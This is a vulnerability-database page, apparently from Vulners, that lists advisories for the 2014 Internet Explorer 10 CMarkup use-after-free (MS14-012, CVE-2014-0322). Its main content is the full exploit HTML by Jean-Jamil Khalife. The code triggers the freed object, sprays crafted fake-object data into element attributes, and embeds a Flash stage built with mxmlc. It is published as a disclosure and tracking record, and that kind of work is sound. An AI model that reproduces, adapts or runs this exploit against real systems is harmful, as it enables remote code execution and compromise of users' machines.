Vulners
Lucene search
MS14-012 Internet Explorer CMarkup Use-After-Free
🗓️ 14 Apr 2014 00:00:00Reported by Jean-Jamil KhalifeType 
packetstorm🔗 packetstormsecurity.com👁 50 Views
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77) - CMarkup Use-After-Free | 15 Apr 201400:00 | – | zdt |
| MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free | 16 Apr 201400:00 | – | zdt |
 | Microsoft Internet Explorer 6 through 11 Arbitrary Code Execution | 29 Apr 201400:00 | – | nessus |
| MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution | 20 Feb 201400:00 | – | nessus |
| MS14-012: Cumulative Security Update for Internet Explorer (2925418) | 11 Mar 201400:00 | – | nessus |
 | CVE-2014-0322 | 14 Feb 201400:00 | – | attackerkb |
| Microsoft Internet Explorer Use-After-Free Vulnerability | 14 Feb 201400:00 | – | attackerkb |
 | CVE-2014-0322 | 14 Feb 201410:09 | – | circl |
 | Microsoft Internet Explorer Use-After-Free Vulnerability | 4 May 202200:00 | – | cisa_kev |
 | Microsoft Internet Explorer Use-After-Free Code Execution (CVE-2014-0322) | 15 Feb 201400:00 | – | checkpoint_advisories |
10
`<!--
MS14-012 Internet Explorer CMarkup Use-After-Free
Vendor Homepage: http://www.microsoft.com
Version: IE 10
Date: 2014-03-31
Exploit Author: Jean-Jamil Khalife
Tested on: Windows 7 SP1 x64 (fr, en)
Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
Home: http://www.hdwsec.fr
Blog : http://www.hdwsec.fr/blog/
MS14-012 / CVE-2014-0322
Generation:
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as
-->
<html>
<head>
</head>
<body>
<script>
var g_arr = [];
var arrLen = 0x250;
function dword2data(dword)
{
var d = Number(dword).toString(16);
while (d.length < 8)
d = '0' + d;
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}
function eXpl()
{
var a=0;
for (a=0; a < arrLen; a++) {
g_arr[a] = document.createElement('div');
}
// Build a new object
var b = dword2data(0x19fffff3);
while (b.length < 0x360)
{
// mov eax,dword ptr [esi+98h]
// ...
// mov eax,dword ptr [eax+8]
// and dword ptr [eax+2F0h],0FFFFFFBFh
if (b.length == (0x98 / 2))
{
b += dword2data(0x1a000010);
}
// mov ecx,dword ptr [edx+94h]
// mov eax,dword ptr [ecx+0Ch]
else if (b.length == (0x94 / 2))
{
b += dword2data(0x1a111111);
}
// mov eax,dword ptr [edx+15Ch]
// mov ecx,dword ptr [eax+edx*8]
else if (b.length == (0x15c / 2))
{
b += dword2data(0x42424242);
}
else
{
b += dword2data(0x19fffff3);
}
}
var d = b.substring(0, ( 0x340 - 2 )/2);
// trigger
try{
this.outerHTML=this.outerHTML
}
catch(e){
}
CollectGarbage();
// Replace freed object
for (a=0; a < arrLen; a++)
{
g_arr[a].title = d.substring(0, d.length);
}
}
// Trigger the vulnerability
function trigger()
{
var a = document.getElementsByTagName("script");
var b = a[0];
b.onpropertychange = eXpl;
var c = document.createElement('SELECT');
c = b.appendChild(c);
}
</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Apr 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.92968